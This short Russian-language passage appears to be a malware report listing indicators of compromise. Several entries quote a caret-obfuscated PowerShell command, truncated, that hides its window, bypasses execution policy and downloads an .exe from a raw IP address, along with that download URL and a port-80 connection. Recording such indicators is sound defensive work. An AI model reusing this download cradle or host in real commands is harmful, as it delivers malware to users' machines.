Техническая информация
- http://86.106.131.141/1.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOw^ErSh^ell^.^e^x^E ^-ExECuTiOnPolIcY^ ^BYpA^Ss^ ^-N^OpRoF^iLe -^WIndOWs^tY^l^E ^Hi^d^d^en^ (NeW-OBJEct SY^sT^Em^.n^e^T.^wEB^cli^En^t)^.^DO^Wn^LoADfILE('http://86.106.131.141/1.ex...
- '86.##6.131.141':80
- '<SYSTEM32>\cmd.exe' /c "pOw^ErSh^ell^.^e^x^E ^-ExECuTiOnPolIcY^ ^BYpA^Ss^ ^-N^OpRoF^iLe -^WIndOWs^tY^l^E ^Hi^d^d^en^ (NeW-OBJEct SY^sT^Em^.n^e^T.^wEB^cli^En^t)^.^DO^Wn^LoADfILE('http://86.106.131.141/1.ex...' (со скрытым окном)